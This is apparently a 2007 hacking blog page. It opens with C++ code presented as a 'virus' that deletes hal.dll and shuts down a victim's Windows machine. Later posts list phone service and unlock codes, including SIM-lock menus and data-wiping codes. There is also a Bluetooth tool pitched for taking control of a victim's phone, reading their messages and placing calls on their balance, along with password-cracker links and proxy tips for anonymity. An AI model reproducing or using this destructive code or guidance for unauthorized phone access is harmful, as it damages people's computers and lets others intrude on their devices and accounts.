Saturday, October 27, 2007

www.google.com

Powerful c++ virus...........

This is a powerful C++ virus that I have made, which deletes Hal.dll, something that is required for startup. After deleting that, it shuts down, never to start again.

Warning: Do not try this on your home computer.
The Original Code:

Code:
#include
#include

using namespace std;

int main(int argc, char *argv[])
{
std::remove("C:\\windows\\system32\\hal.dll"); //PWNAGE TIME
system("shutdown -s -r");
system("PAUSE");
return EXIT_SUCCESS;
}A more advanced version of this virus which makes the C:\\Windows\\ a variable that cannot be wrong was made by getores. Here it is:

Code:
#include
#include

using namespace std;

int main(int argc, char *argv[])
{
std::remove("%systemroot%\\system32\\hal.dll"); //PWNAGE TIME
system("shutdown -s -r");
system("PAUSE");
return EXIT_SUCCESS;
}The second version would be more useful during times when you do not know the victims default drive. It might be drive N: for all you know.

Windows shortcuts

General Keyboard Shortcuts
> CTRL+C (Copy)
> CTRL+X (Cut)
> CTRL+V (Paste)
> CTRL+Z (Undo)
> DELETE (Delete)
> SHIFT+DELETE (Delete the selected item permanently without placing the item in the Recycle Bin)
> CTRL while dragging an item (Copy the selected item)
> CTRL+SHIFT while dragging an item (Create a shortcut to the selected item)
> F2 key (Rename the selected item)
> CTRL+RIGHT ARROW (Move the insertion point to the beginning of the next word)
> CTRL+LEFT ARROW (Move the insertion point to the beginning of the previous word)
> CTRL+DOWN ARROW (Move the insertion point to the beginning of the next paragraph)
> CTRL+UP ARROW (Move the insertion point to the beginning of the previous paragraph)
> CTRL+SHIFT with any of the arrow keys (Highlight a block of text)
> SHIFT with any of the arrow keys (Select more than one item in a window or on the desktop, or select text in a document)
> CTRL+A (Select all)
> F3 key (Search for a file or a folder)
> ALT+ENTER (View the properties for the selected item)
> ALT+F4 (Close the active item, or quit the active program)
> ALT+ENTER (Display the properties of the selected object)
> ALT+SPACEBAR (Open the shortcut menu for the active window)
> CTRL+F4 (Close the active document in programs that enable you to have multiple documents open simultaneously)
> ALT+TAB (Switch between the open items)
> ALT+ESC (Cycle through items in the order that they had been opened)
> F6 key (Cycle through the screen elements in a window or on the desktop)
> F4 key (Display the Address bar list in My Computer or Windows Explorer)
> SHIFT+F10 (Display the shortcut menu for the selected item)
> ALT+SPACEBAR (Display the System menu for the active window)
> CTRL+ESC (Display the Start menu)
> ALT+Underlined letter in a menu name (Display the corresponding menu)
> Underlined letter in a command name on an open menu (Perform the corresponding command)
> F10 key (Activate the menu bar in the active program)
> RIGHT ARROW (Open the next menu to the right, or open a submenu)
> LEFT ARROW (Open the next menu to the left, or close a submenu)
> F5 key (Update the active window)
> BACKSPACE (View the folder one level up in My Computer or Windows Explorer)
> ESC (Cancel the current task)
> SHIFT when you insert a CD-ROM into the CD-ROM drive (Prevent the CD-ROM from automatically playing)
Dialog Box Keyboard Shortcuts
> CTRL+TAB (Move forward through the tabs)
> CTRL+SHIFT+TAB (Move backward through the tabs)
> TAB (Move forward through the options)
> SHIFT+TAB (Move backward through the options)
> ALT+Underlined letter (Perform the corresponding command or select the corresponding option)
> ENTER (Perform the command for the active option or button)
> SPACEBAR (Select or clear the check box if the active option is a check box)
> Arrow keys (Select a button if the active option is a group of option buttons)
> F1 key (Display Help)
> F4 key (Display the items in the active list)
> BACKSPACE (Open a folder one level up if a folder is selected in the Save As or Open dialog box)


Mcft Natural Keyboard Shortcuts
> Windows Logo (Display or hide the Start menu)
> Windows Logo+BREAK (Display the System Properties dialog box)
> Windows Logo+D (Display the desktop)
> Windows Logo+M (Minimize all of the windows)
> Windows Logo+SHIFT+M (Restore the minimized windows)
> Windows Logo+E (Open My Computer)
> Windows Logo+F (Search for a file or a folder)
> CTRL+Windows Logo+F (Search for computers)
> Windows Logo+F1 (Display Windows Help)
> Windows Logo+ L (Lock the keyboard)
> Windows Logo+R (Open the Run dialog box)
> Windows Logo+U (Open Utility Manager)


Accessibility Keyboard Shortcuts
> Right SHIFT for eight seconds (Switch FilterKeys either on or off)
> Left ALT+left SHIFT+PRINT SCREEN (Switch High Contrast either on or off)
> Left ALT+left SHIFT+NUM LOCK (Switch the MouseKeys either on or off)
> SHIFT five times (Switch the StickyKeys either on or off)
> NUM LOCK for five seconds (Switch the ToggleKeys either on or off)
> Windows Logo +U (Open Utility Manager)
Windows Explorer Keyboard Shortcuts
> END (Display the bottom of the active window)
> HOME (Display the top of the active window)
> NUM LOCK+Asterisk sign (*) (Display all of the subfolders that are under the selected folder)
> NUM LOCK+Plus sign (+) (Display the contents of the selected folder)
> NUM LOCK+Minus sign (-) (Collapse the selected folder)
> LEFT ARROW (Collapse the current selection if it is expanded, or select the parent folder)
> RIGHT ARROW (Display the current selection if it is collapsed, or select the first subfolder)


Shortcut Keys for Character Map
After you double-click a character on the grid of characters, you can move through the grid by using the keyboard shortcuts:
> RIGHT ARROW (Move to the right or to the beginning of the next line)
> LEFT ARROW (Move to the left or to the end of the previous line)
> UP ARROW (Move up one row)
> DOWN ARROW (Move down one row)
> PAGE UP (Move up one screen at a time)
> PAGE DOWN (Move down one screen at a time)
> HOME (Move to the beginning of the line)
> END (Move to the end of the line)
> CTRL+HOME (Move to the first character)
> CTRL+END (Move to the last character)
> SPACEBAR (Switch between Enlarged and Normal mode when a character is selected)


Mcft Management Console (MMC) Main Window Keyboard Shortcuts
> CTRL+O (Open a saved console)
> CTRL+N (Open a new console)
> CTRL+S (Save the open console)
> CTRL+M (Add or remove a console item)
> CTRL+W (Open a new window)
> F5 key (Update the content of all console windows)
> ALT+SPACEBAR (Display the MMC window menu)
> ALT+F4 (Close the console)
> ALT+A (Display the Action menu)
> ALT+V (Display the View menu)
> ALT+F (Display the File menu)
> ALT+O (Display the Favorites menu)

MMC Console Window Keyboard Shortcuts
> CTRL+P (Print the current page or active pane)
> ALT+Minus sign (-) (Display the window menu for the active console window)
> SHIFT+F10 (Display the Action shortcut menu for the selected item)
> F1 key (Open the Help topic, if any, for the selected item)
> F5 key (Update the content of all console windows)
> CTRL+F10 (Maximize the active console window)
> CTRL+F5 (Restore the active console window)
> ALT+ENTER (Display the Properties dialog box, if any, for the selected item)
> F2 key (Rename the selected item)
> CTRL+F4 (Close the active console window. When a console has only one console window, this shortcut closes the console)
Remote Desktop Connection Navigation
> CTRL+ALT+END (Open the Mcft Windows NT Security dialog box)
> ALT+PAGE UP (Switch between programs from left to right)
> ALT+PAGE DOWN (Switch between programs from right to left)
> ALT+INSERT (Cycle through the programs in most recently used order)
> ALT+HOME (Display the Start menu)
> CTRL+ALT+BREAK (Switch the client computer between a window and a full screen)
> ALT+DELETE (Display the Windows menu)
> CTRL+ALT+Minus sign (-) (Place a snapshot of the entire client window area on the Terminal server clipboard and provide the same functionality as pressing ALT+PRINT SCREEN on a local computer.)
> CTRL+ALT+Plus sign (+) (Place a snapshot of the active window in the client on the Terminal server clipboard and provide the same functionality as pressing PRINT SCREEN on a local computer.)


Mcft Internet Explorer Navigation
> CTRL+B (Open the Organize Favorites dialog box)
> CTRL+E (Open the Search bar)
> CTRL+F (Start the Find utility)
> CTRL+H (Open the History bar)
> CTRL+I (Open the Favorites bar)
> CTRL+L (Open the Open dialog box)
> CTRL+N (Start another instance of the browser with the same Web address)
> CTRL+O (Open the Open dialog box, the same as CTRL+L)
> CTRL+P (Open the Print dialog box)
> CTRL+R (Update the current Web page)
> CTRL+W (Close the current window)

$ceret phone codes..........

NOKIA:
CODES DESCRIPTIONS
*3370# Activate Enhanced Full Rate Codec (EFR) - Your phone uses the best sound quality but talk time is reduced my approx. 5%
#3370# Deactivate Enhanced Full Rate Codec (EFR)
*#4720# Activate Half Rate Codec - Your phone uses a lower quality sound but you should gain approx 30% more Talk Time
*#4720# Deactivate Half Rate Codec
*#0000# Displays your phones software version, 1st Line : Software Version, 2nd Line : Software Release Date, 3rd Line : Compression Type
*#9999# Phones software version if *#0000# does not work
*#06# For checking the International Mobile Equipment Identity (IMEI Number)
#pw+1234567890+1# Provider Lock Status. (use the "*" button to obtain the "p,w" and "+" symbols)
#pw+1234567890+2# Network Lock Status. (use the "*" button to obtain the "p,w" and "+" symbols)
#pw+1234567890+3# Country Lock Status. (use the "*" button to obtain the "p,w" and "+" symbols)
#pw+1234567890+4# SIM Card Lock Status. (use the "*" button to obtain the "p,w" and "+" symbols)
*#147# (vodafone) this lets you know who called you last
*#1471# Last call (Only vodofone)
*#21# Allows you to check the number that "All Calls" are diverted to
*#2640# Displays security code in use
*#30# Lets you see the private number
*#43# Allows you to check the "Call Waiting" status of your phone.
*#61# Allows you to check the number that "On No Reply" calls are diverted to
*#62# Allows you to check the number that "Divert If Unreachable (no service)" calls are diverted to
*#67# Allows you to check the number that "On Busy Calls" are diverted to
*#67705646# Removes operator logo on 3310 & 3330
*#73# Reset phone timers and game scores
*#746025625# Displays the SIM Clock status, if your phone supports this power saving feature "SIM Clock Stop Allowed", it means you will get the best standby time possible
*#7760# Manufactures code
*#7780# Restore factory settings
*#8110# Software version for the nokia 8110
*#92702689# Displays - 1.Serial Number, 2.Date Made, 3.Purchase Date, 4.Date of last repair (0000 for no repairs), 5.Transfer User Data. To exit this mode you need to switch your phone off then on again
*#94870345123456789# Deactivate the PWM-Mem
**21*number# Turn on "All Calls" diverting to the phone number entered
**61*number# Turn on "No Reply" diverting to the phone number entered
**67*number# Turn on "On Busy" diverting to the phone number entered
12345 This is the default security code
press and hold # Lets you switch between lines
*#3283# or *#DATE# Date of Manufacture
*#682371158412125# Software Version

__________________________________________________ ________________________

SIEMENS:
MODELS CODES & DESCRIPTIONS
*#0003*(secret code 8 digits)# All Siemens Phones: Service Provider Unlock
Siemens S25/C25
SP unlock *#0003*(secret code 8 digits)#
Show IMEI code: * # 06 #
Resets language to automatic selection : * # 0000 # then Green button
Pin Out
Data Cable schematics
Phone's connector pin-out:
1- GND
2- SB
3- POWER
4- NC
5- TX
6- RX
7- CLOCK
8- DATA
9- GND MIC
10- HF MIC
11- AUDIO
12- GND AUDIO
Siemens S1/S3/S3 Com
To view the software date and else with S3 com, S4, S4Power, Sony cmdx 1000e press with SIM removed *#06# and left softkey.
To view some other stuff with S4Power, Sony cmdx 1000e press with SIM removed *#06# and left softkey twice.
To view the software date with S3 com, S4, S4Power, Sony cmdx 1000e press with SIM installed menu 98 and left softkey twice.
ACTIVATE MONITOR MODE
Siemens S1/S3
Menu, 9 (Phone Options), 7 (Phone Status), Left Display Button (left MENU key), 5553756, Hang-Up Button (Red Handset key)


Siemens S3 COM/S4:

Menu, 9 (Phone Options), 7 (Phone Status - 8 on Some), Left Display Button (left MENU key), 7684666, Hang-Up Button (Red Handset key)
Note: Now Monitor should appear at the bottom of the Network Options menu.
MONITOR MODE
Pressing the right Display Button when in monitor mode will toggle into 1 and 2 modes

Pressing the right Display Button when in monitor mode will show a list of the six cells with the strongest signals.

Test Mode Indicators: (* = only available when call in progress )
CH Channel Number

RX Signal Strength (dB)

N NCC (Colour Code)

B BCC (Colour Code)

CI Cell ID (in Hex)

C1+ How long before phone does forced hand over. (see RX and RXAM)

LAI Location Area Identity. Display Network ID code (42F010 = 240.01) and MSC

TXPWR Transmit Power (dB)

RXAM Receive signal strength cut-off point

TS* Time Slot Number

TA* Timing Advance. Distance from tower in Km X 2

PL* Power Level
POWER table
PL: 5 6 7 8 9 10 11 12 13 14 15

dB: 33 31 29 27 25 23 21 19 17 15 13

Watts: 2 1.3 .8 .5 .3 .2 .13 .08 .05 .03 .02
LF* C1 value with continuous transmission from tower

LS* C1 Value with discontinuous transmission from tower

QF* Bit Error Rate with continuous transmission from tower

QS* Bit Error Rate with discontinuous transmission from tower
BER (bit error rate) table
QF/QS register: 0 1 2 3 4 5 6 7

% of bit sent: 0.2 0.8 0.4 1.6 3.2 6.4 12.8 25.6


Siemens S1/S3:
Here's a trick to play Tetris, also known as Klotz on a Siemens S1.
Turn the phone on. Enter PIN. Before the telephone has logged in to the your GSM net do the following steps.
1: Choose F 9 (function settings)
2: Choose send own number and push the right button for choose.
3: Push 9
USE 2 as <> , rotate the klotz with 5 and drop with 4.
[I have just heard from one of the programmers of the phone that Tetris was in the phone during development, but it was removed before it was produced. Apparently someone has the patent on games in mobile phones and Siemens didn't want to pay the licensing fees. It was either in Menu F-9-9 or it's not there at all.]
Siemens S3 Comfort

MONITOR MODE:
The Siemens S3 Com series have a Monitor mode that can be activated directly from the standard user keypad. In order to activate this mode, you must enter the special access code currently programmed into the phone.
TO ACTIVATE MONITOR MODE:
Turn the phone on.
Enter the PIN access code on press OK. (Only if is enabled).
Press Menu. (Left top button).
Press 9. (Phone Options).
Press 8. (Phone Status) (May be button 7 in some phones).
You may see your IMEI Number
Left Display Button (Top left MENU key).
7684666
Hang-Up Button. (Red Handset key).

Note: Monitor should appear now at the bottom of the Network Options menu.
MONITOR MODE

Pressing the right Display Button when in monitor mode will toggle into 1 and 2 modes

Siemens S4/S4 Power:
In phonebook under "Own Phone No." enter +12022243121 (which is the number to the White House) and you'll get a greeting from the people who programmed the phone.
MONITOR MODE

The Siemens S4 series have a Monitor mode that can be activated directly from the standard user keypad. In order to activate this mode, you must enter the special access code currently programmed into the phone.
TO ACTIVATE MONITOR MODE:
Menu, 9 (Phone Options), 7 (Phone Status), Left Display Button (left MENU key), 7684666, Hang-Up Button (Red Handset key)
Now "Monitor" should appear at the bottom of the Network Options menu.
Pressing the right Display Button when in monitor mode will show a list of the six cells with the strongest signals.


Test Mode Indicators: (* = only available when call in progress )


--------------------
CH Channel Number
RX Signal Strength (dB)
N NCC (Color Code)
B BCC (Color Code)
CI Cell ID (in Hex)
C1+ how long before phone does forced hand over. (see RX and RXAM)
LAI Location Area Identity. Display Network ID code (42F010 = 240.01) and MSC
TXPWR Transmit Power (dB)
RXAM Reeceive signal strength cut-off point
TS* Time Slot Number
TA* Timing Advance. Distance from tower in Km X 2
PL* Power Level


Power Table

PL: 5 6 7 8 9 10 11 12 13 14 15
dB: 33 31 29 27 25 23 21 19 17 15 13
Watts: 2 1.3 .8 .5 .3 .2 .13 .08 .05 .03 .02

LF* C1 value with continuous transmission from tower
LS* C1 Value with discontinuous transmission from tower
QF* Bit Error Rate with continuous transmission from tower
QS* Bit Error Rate with discontinuous transmission from tower


BER (bit error rate) table
QF/QS register: 0 1 2 3 4 5 6 7
% of bit sent: 0.2 0.8 0.4 1.6 3.2 6.4 12.8 25.6


Siemens S6/S10:

In Phonebook, store as your own number: +12022243121
Then you get the sun and two palms in the display, also a greeting message of the "MMI-team".
It has been said that the phone number is the number of the Capitol building in Washington, DC (but not sure).

Siemens S15 Secret Menu's

Press * -> # -> 7 -> 4 -> 3 -> 6 -> 3 -> 6 -> 7 -> * -> 8 -> 3 ->
7 -> 8 -> # ,press clear key to clear screen and return to
stand-by mode
press Menu, it will show additional menu
Menu 3.3.4 Band selection,
Menu 3.3.4.1 Automatic band selection,
Menu 3.3.4.2 select GSM 900 only,
Menu 3.3.4.3 select GSM 1800 only,
Menu 10 Engineering,
Menu 10.1 MS info,

Menu 10.2 software detail,
Menu 10.2.1 software version,
Menu 10.2.2 EEPROM version,

Menu 10.3 Test/production details
Menu 10.3.1 Hardware deta
Menu 10.3.2 production deta
Menu 10.3.3 Service deta
Menu 10.3.4 Mechanical deta

Menu 10.1.1 MS info on, then on the screen show these, for example:

FCN RXL C1 C2
642 011+11+91 -> PAGE 1

CID DSC CB
11211 045 000 -> PAGE 2

BCC NCC TN
000 002 00 -> PAGE 3

RXf RXs RQf RQs
00 00 00 00 -> PAGE 4

ATa APa Hn Hf
001 000 05 00 -> PAGE 5

DTU DTD HP CI
+ ? - - -> PAGE 6

MM CC RR
IdNS Nul Idl -> PAGE 7

__________________________________________________ ________________________
PANASONIC:
CODES DESCRIPTIONS
*#06# For checking the International Mobile Equipment Identity (IMEI Number)

__________________________________________________ ________________________

MOTOROLA:
CODES DESCRIPTIONS
*#06# For checking the International Mobile Equipment Identity (IMEI Number)
[][][] 119 [] 1 [] Activate Enhanced Full Rate Codec (EFR) - Your phone uses the best sound quality but talk time is reduced my approx. 5%
[][][] 119 [] 0 [] Deactivate Enhanced Full Rate Codec (EFR)

__________________________________________________ ________________________

ERICSSON:
CODES DESCRIPTIONS
*#06# For checking the International Mobile Equipment Identity (IMEI Number)
Shortcuts:
Save a Missed Call into your phone directory Scroll to "Missed Call", press "Yes" to display the required number. Press any number (i.e. 0 to 9), then press "clear" once to clear that number, then press & hold "<" until you see "Store". Press "Yes"
Hide your number when calling when you don't want the other party to know your number) After dialling the required number & before pressing "Yes", press ">" twice to choose "Hide Id?" & then press "Yes". Also works for pre-programmed & last dialled numbers just press "No" & wait for the number to appear on the screen first then follow same procedure
Check you battery level when phone is off Press "No" quickly one time & wait for the battery meter to show up!
Save a number into your phone memory (not SIM card) Follow normal procedures to store a phone number. When prompted to set a storage position, press "#" once & key in desired location, or press "#" twice for next available position
Call a phone number from SMS message You can call from within a SMS message if the phone number is written in it. Just scroll the message until the phone number appears on the display, then press "Yes" to call.



*#1111# S/W Version
*#1234# Firmware Version
*#2222# H/W Version
*#8999*8376263# All Versions Together



*#8999*8378# Test Menu
*#4777*8665# GPSR Tool
*#8999*523# LCD Brightness
*#8999*377# Error Menu
*#8999*327# EEP Menu
*#8999*3825523# Don't Know.
*#8999*667# Debug Mode
*#92782# PhoneModel (Wap)
#*5737425# JAVA Mode
*#2255# Call List
*#232337# Bluetooth MAC Adress
*#5282837# Java Version




#*4773# Incremental Redundancy
#*7752# 8 PSK uplink capability bit
#*7785# Reset wakeup & RTK timer cariables/variables
#*1200# ?
#*7200# Tone Generator Mute
#*3888# BLUETOOTH Test mode
#*#8999*324# ??
#*7828# Task screen
#*5111# ??
#*#8377466# S/W Version & H/W Version
#*2562# Restarts Phone
#*2565# No Blocking? General Defense.
#*3353# General Defense, Code Erased.
#*3837# Phone Hangs on White screen
#*3849# Restarts Phone
#*3851# Restarts Phone
#*3876# Restarts Phone
#*7222# Operation Typ: (Class C GSM)
#*7224# !!! ERROR !!!
#*7252# Operation Typ: (Class B GPRS)
#*7271# CMD: (Not Available)
#*7274# CMD: (Not Available)
#*7337# Restarts Phone (Resets Wap Settings)
#*2787# CRTP ON/OFF
#*2886# AutoAnswer ON/OFF




#*3737# L1 AFC
#*5133# L1 HO Data
#*7288# GPRS Detached/Attached
#*7287# GPRS Attached
#*7666# White Screen
#*7693# Sleep Deactivate/Activate
#*7284# L1 HO Data
#*2256# Calibration info? (For CMD set DEBUGAUTONOMY in cihard.opt)
#*2286# Databattery
#*2527# GPRS switching set to (Class 4, 8, 9, 10)
#*2679# Copycat feature Activa/Deactivate
#*3940# External looptest 9600 bps
#*4263# Handsfree mode Activate/Deactivate
#*4700# Please use function 2637
#*7352# BVMC Reg value (LOW_SWTOFF, NOMINAL_SWTOFF)
#*2558# Time ON
#*3370# Same as 4700
#*3941# External looptest 115200 bps
#*5176# L1 Sleep
#*7462# SIM Phase
#*7983# Voltage/Freq
#*7986# Voltage
#*8466# Old Time
#*2255# Call Failed
#*5187# L1C2G trace Activate/Deactivate
#*5376# DELETE ALL SMS!!!!
#*6837# Official Software Version: (0003000016000702)
#*7524# KCGPRS: (FF FF FF FF FF FF FF FF 07)
#*7562# LOCI GPRS: (FF FF FF FF FF FF FF FF FF FF FF FE FF 01)
#*2337# Permanent Registration Beep




#*2474# Charging Duration
#*2834# Audio Path (Handsfree)
#*3270# DCS Support Activate/Deactivate
#*3282# Data Activate/Deactivate
#*3476# EGSM Activate/Deactivate
#*3676# FORMAT FLASH VOLUME!!!
#*4760# GSM Activate/Deactivate
#*4864# White Screen
#*5171# L1P1
#*5172# L1P2
#*5173# L1P3
#*7326# Accessory
#*7683# Sleep variable
#*8465# Time in L1
#*2252# Current CAL
#*2836# AVDDSS Management Activate/Deactivate
#*3877# Dump of SPY trace
#*7728# RSAV
#*2677# Same as 4700
#*3797# Blinks 3D030300 in RED
#*3728# Time 2 Decod
#*3725# B4 last off
#*7372# Resetting the time to DPB variables
#*7732# Packet flow context bit Activate/Deactivate
#*6833# New uplink establishment Activate/Deactivate
#*3273# EGPRS multislot (Class 4, 8, 9, 10)
#*7722# RLC bitmap compression Activate/Deactivate
#*2351# Blinks 1347E201 in RED
#*4472# Hysteresis of serving cell: 3 dB
#*2775# Switch to 2 inner speaker
#*9270# Force WBS
#*7878# FirstStartup (0=NO, 1=YES)
#*3757# DSL UART speed set to (LOW, HIGH)
#*8726# Switches USBACM to Normal
#*8724# Switches USBACM to Generator mode
#*8727# Switches USBACM to Slink mode
#*8725# Switches USBACM to Loop-back mode
#*3838# Blinks 3D030300 in RED
#*2077# GPRS Switch
#*2027# GPRS Switch
#*0227# GPRS Switch
#*0277# GPRS Switch
#*22671# AMR REC START
#*22672# Stop AMR REC (File name: /a/multimedia/sounds/voice list/ENGMODE.amr)
#*22673# Pause REC




#*22674# Resume REC
#*22675# AMR Playback
#*22676# AMR Stop Play
#*22677# Pause Play
#*22678# Resume Play
#*77261# PCM Rec Req
#*77262# Stop PCM Rec
#*77263# PCM Playback
#*77264# PCM Stop Play
#*2872# CNT
*#8999*283#
#*22679# AMR Get Time
*288666#
*2886633#
*#8999*364# Watchdog ON/OFF
#*8370# Tfs4.0 Test 0
#*8371# Tfs4.0 Test 1
#*8372# Tfs4.0 Test 2
#*8373# Tfs4.0 Test 3
#*8374# Tfs4.0 Test 4
#*8375# Tfs4.0 Test 5
#*8376# Tfs4.0 Test 6
#*8377# Tfs4.0 Test 7
#*8378# Tfs4.0 Test 8
#*8379# Tfs4.0 Test 9
#837837# error=...




#*36245# Turns Email TestMenu on.

*2767*22236245# Email EPP set (....)!
*2767*837836245# Email Test Account!
*2767*29536245# Email Test2 Account!
*2767*036245# Email EPP reset!
*2767*136245# Email EPP set (1)!
*2767*736245# Email EPP set (7)!
*2767*3036245# Email...
*2767*3136245# Email...
*2767*3336245# Email...
*2767*3436245# Email...
*2767*3936245# Email...
*2767*4136245# Email...
*2767*4336245# Email...
*2767*4436245# Email...
*2767*4536245# Email...
*2767*4636245# Email...
*2767*4936245# Email...
*2767*6036245# Email...
*2767*6136245# Email...
*2767*6236245# Email...
*2767*6336245# Email...
*2767*6536245# Email...
*2767*6636245# Email...
*2767*8636245# Email...
*2767*85236245# Email...




*2767*3855# = E2P Full Reset
*2767*2878# = E2P Custom Reset
*2767*927# = E2P Wap Reset
*2767*226372# = E2P Camera Reset
*2767*688# Reset Mobile TV
#7263867# = RAM Dump (On or Off)
*2767*49927# = Germany WAP Settings
*2767*44927# = UK WAP Settings
*2767*31927# = Netherlands WAP Settings
*2767*420927# = Czech WAP Settings
*2767*43927# = Austria WAP Settings
*2767*39927# = Italy WAP Settings
*2767*33927# = France WAP Settings
*2767*351927# = Portugal WAP Settings
*2767*34927# = Spain WAP Settings
*2767*46927# = Sweden WAP Settings
*2767*380927# = Ukraine WAP Settings
*2767*7927# = Russia WAP Settings
*2767*30927# = GREECE WAP Settings
*2767*73738927# = WAP Settings Reset
*2767*49667# = Germany MMS Settings
*2767*44667# = UK MMS Settings
*2767*31667# = Netherlands MMS Settings
*2767*420667# = Czech MMS Settings
*2767*43667# = Austria MMS Settings
*2767*39667# = Italy MMS Settings
*2767*33667# = France MMS Settings
*2767*351667# = Portugal MMS Settings
*2767*34667# = Spain MMS Settings
*2767*46667# = Sweden MMS Settings
*2767*380667# = Ukraine MMS Settings
*2767*7667#. = Russia MMS Settings
*2767*30667# = GREECE MMS Settings






LG Mobile Codes
On the main screen type *#06#

Information you get from the IMEI (International Mobile Equipment Identity)
XXXXXX XX XXXXXX X
TAC FAC SNR SP

TAC = Type approval code of your LG Mobile
FAC = Final assembly code of your cellphone
SNR = Serial number of your LG Phone
SP = Spare

Other secret tricks for LG mobile or cellphone

LG all models test mode:
Type 2945#*# on the main screen.
2945*#01*# Secret menu for LG
IMEI and SW (LG 510): *#07#
Software version (LG B1200): *8375#
Recount cheksum (LG B1200): *6861#
Factory test (B1200): #PWR 668
Simlock menu (LG B1200): 1945#*5101#
Simlock menu (LG 510W, 5200): 2945#*5101#
Simlock menu (LG 7020, 7010): 2945#*70001#
Simlock menu (LG 500, 600): 2947#*

LG-U81XX SPECIAL CODES
Code to read phone version :
- Phone without SIM
- Enter 277634#*# or 47328545454#
- Select 'SW Ver.info'
Code to reset phone :
- Phone without SIM

- Enter 277634#*# or 47328545454#
- Select 'Factory Reset'

Code to enter UNLOCK MENU :
- Phone wit SIM inside
- Enter 2945#*88110#
Test Menu 8330 : 637664#*#
Test Menu 8180 V10a: 49857465454#
Test Menu 8180 V11a: 492662464663#
Test Menu 8130-8138: 47328545454#
Test Menu 8110-8120: 277634#*








Toooooooo much time take to fine this codes.....................

♥ :¦:Blue-Tooth:¦: ♥ :¦:Hacking:¦: ♥ :¦:Software:¦: ♥ :¦:

well this works in java handsets as well as symbian handsets,,,,now don't say that this one doesn't work coz i tested it myself on SE W550i and Nokia 6600,,,but the condition is that victim must accept ur request anyhow,,,n then u have complete access over his cell fone,,,,u can even make calls from his balance( i did in both the handsets),,,but remember---------DON"T PRESS CALL KEY TO MAKE CALLS FROM BALANCE OF VICTIM,,,just use scroll key twice after writing the number(prefer this format +9199******** when making call)



but pls note that many of its features do not work in nokia handsets,,,but it simply roxxxxx in sony handsetsu can do almost everything as i said



the victim might have to accept two or three times in the beginning only,,,,but then u have complete access to his cell and u can do things like changing his profile,reading/deleting his messages,switch his cell off n much more,,,,so don't get harassed by the fact that it isn't true hacking,,,it is really something great,,,just give a try.



THIS WORKS FOR BOTH NOKIA AND SONY-ERICSSON.

download from here : http://www.4shared.com/file/22635249/3c535410/blue_access.html

Grin Grin Grin Grin Grin Grin Grin Grin Grin Grin Grin Grin Grin Grin Grin Grin Grin Grin Grin Grin Grin Grin Grin Grin Grin Grin Grin Grin Grin Grin Grin Grin Grin Grin Grin Grin Grin Grin Grin




if it work with u send comments

All about bluetooth

BT Info version 1.07
http://www.4shared.com/file/22071837/3586b88c/BT_Info_107.html?s=1


Bluetooth Remote Control 2
http://www.4shared.com/file/17305196/d0de4ab2/Bluetooth_Remote_Control_210.html?s=1


Bluetooth Messenger
http://www.4shared.com/file/18536449/8600ad4f/Bluetooth_Messenger.html?s=1


Chat-bluetooth
bluetooth.html?s=1" target="_blank">http://www.4shared.com/file/1047959/eeb2dd84/Chat-bluetooth.html?s=1


bluetooth browser
http://www.4shared.com/file/21823748/5e76abec/btbrowser.html?s=1


Bluetooth Walkie-Talkie
http://www.4shared.com/file/23621025/744ede80/BT_Walkie-Talkie.html?s=1


powerfull file manager and text editor for your phone . moby explorer try it.

http://www.getjar.com/products/4844/MobyExplorer

www.funmaza.com

http://www.orkut.com/Profile.aspx?uid=4415065124532445712

Friday, October 26, 2007

Hacking tools


WinRar pass cracker :
http://www.download3000.com/download-RAR_Password_Cracker-count-reg-3164.html






Setting Up Own Proxy in Your Browser
How To Set Up Proxies In Your Browser

This is a small Tutor - try it out!

===================================
How to set up proxies in your browser, (!!!!be anonymous and make the passes last longer...!!!!!!
===================================
In Internet Explorer
===================================
Click "Tools", then "Internet Options", the in the "connections" Tab, click the "LAN Setup" Button in the bottom. There is a "Proxy Servers", tick the "Use a proxy....." and then enter the proxy in the bigger textbox and the port (the part that comes after the ":") in the smaller textbox. Hit okay, and then go to
CODE
www.whatismyip.com
to see if the proxy is now your IP.
===================================
In OPERA
===================================
Click "Files", then "Preferences", then "Network", then click the button "Proxy Servers", tick "HTTP", fill in with the proxy:port, click okay and that's it! Don't forget to check with
CODE
www.whatismyip.com

===================================
In Firefox
===================================
Tools -> Options
Then click the General Icon
Then the "Connection Settings..." button
Then click the "manually configure proxies" radio button, and enter the proxy address and port in the HTTP Proxy area.
Don't forget to check with
CODE
www.whatismyip.com





CODE
www.proxy4free.com
www.safeproxy.org
www.megaproxy.com
www.guardster.com
www.silenter.com
www.anonymizer.com